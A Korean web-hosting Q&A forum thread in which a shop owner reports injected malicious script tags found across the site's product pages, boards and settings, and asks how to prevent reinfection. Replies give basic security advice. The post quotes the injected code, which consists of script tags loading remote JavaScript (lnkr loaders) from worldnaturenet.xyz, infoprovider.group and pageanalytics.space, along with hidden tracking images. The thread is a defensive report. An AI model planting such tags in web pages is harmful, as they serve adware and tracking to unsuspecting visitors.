악성코드가 어마무시 합니다.

악성코드가 어마무시 합니다.

QA

악성코드가 어마무시 합니다.

본문

제가 지난번에 올린 글은 

https://sir.kr/qa/469350?stx=%EA%B5%AC%EA%B8%80+%EA%B4%91%EA%B3%A0&sst=wr_num&sop=and&unanswered=0&unadopted=0&adopted=0&s_tag= 

입니다. 구글광고에서 계속 비승인이 나서 백방으로 알아봤습니다.

카페24에서 친절하게 알려줘서 오늘 대작업을 끝냈습니다.

 

상품상세페이지 및 상하단,

게시글 곳곳과 상하단,

쇼핑몰 상품 카테고리 상하단.. 가리지 않고 심어져 있었습니다. 

 

요놈입니다. worldnature.. 어쩌고 저쩌고...

1890427459_1660045006.3232.jpg

 

오늘 게시판들 다 돌아다니고 상품들 전수조사하고..

DB에 들어가서 검색으로 다 지워냈습니다.

 

그런데 제가 궁금한것은...

오늘 제가 지우고 비번들을 모두 바꾸긴했습니다. 그런데..

그.. 사이트 어딘가에 심어져있는 어플리케이션이 스스로 작동하면서

또, 각종 상품들이나 게시판을 오염시키는게 가능할까요??

글을 쓰다 생각해보니 쇼핑몰 기본설정 아래에도 심어놨더라구요.

하..

 

앞으로 이런일이 생기지 않도록 어떻게 준비해야 할까요?? 

 

참고로 소스는 아래와 같습니다.

 


<script type="text/javascript" src="http://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52096x5793x&r=26"></script>
<script type="text/javascript" src="http://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52096x5793x&r=31"></script>
<script type="text/javascript" src="http://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52096x5793x&r=17"></script>
<script type="text/javascript" src="http://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52096x5793x&r=22"></script>
<script type="text/javascript" src="http://infoprovider.group/addons/lnkr5.min.js"></script>
<script type="text/javascript" src="http://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52096x5793x&r=5"></script>
<script type="text/javascript" src="http://infoprovider.group/addons/lnkr5.min.js"></script><img style="width:0;height:0;display:none;visibility:hidden;" src="http://pageanalytics.space/metric/?mid=&wid=52096&sid=&tid=5793&rid=OPTOUT_RESPONSE_OK&t=1528162274091">
<script type="text/javascript" src="http://pageanalytics.space/optout/set/lat?jsonp=__twb_cb_603677&key=16a168f0af2da0c3c2&cv=1528162270&t=1528162274091"></script>
<script type="text/javascript" src="http://pageanalytics.space/optout/set/lt?jsonp=__twb_cb_12661691&key=16a168f0af2da0c3c2&cv=3992&t=1528162274091"></script>
<script type="text/javascript" src="http://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52096x5793x&r=47"></script>
<script type="text/javascript" src="http://pageanalytics.space/addons/lnkr5.min.js"></script><img style="width:0;height:0;display:none;visibility:hidden;" src="http://pageanalytics.space/metric/?mid=cd1d2&wid=52096&sid=&tid=5793&rid=MNTZ_LOADED&t=1528162274900">

이 질문에 댓글 쓰기 :

답변 4

ftp 비번부터 변경하세요

data 폴더의 첨부 파일 중에서 악성코드가 심어져 있는 파일을 한번 찾아보셔야 할거 같습니다.

일단 서버쪽에 보안망 좋은 업체로 가셔서 쓰신게 좋구요

의뢰를 해서 오염된부분 복구 작업 하셔야될거에요

 

웹킷같은거 저도 당해봤거든요 다 xss 보안 같은거 신경 안쓰다가.. 당해요..
업로드쪽도 커스텀 한거 있으면 기능에서 처리해야되구요 쿠키 쓸때도 조심히 해야하고 csrf 같은것도 좀 해야되고..
이런거 신경 안쓰고 하다가 구멍나요.. 저도 엄청 개고생해봐서.. https 보안인증서도 좀 다셔야하구요..

보안인증서랑은 달았는데.. 다른건 속수무책이네요. 개발자가 이런걸 잘 모르는 분이었고 그나마 지금은 연락이 안됩니다.

 

저도 광고가 중단되고 매출이 떨어지니 이제서야 발등에 불이 떨어진 거죠. 더 알아 봐야 되겠습니다.

답변을 작성하시기 전에 로그인 해주세요.
전체 2,432
QA 내용 검색

회원로그인

(주)에스아이알소프트 / 대표:홍석명 / (06211) 서울특별시 강남구 역삼동 707-34 한신인터밸리24 서관 1404호 / E-Mail: admin@sir.kr
사업자등록번호: 217-81-36347 / 통신판매업신고번호:2014-서울강남-02098호 / 개인정보보호책임자:김민섭(minsup@sir.kr)
© SIRSOFT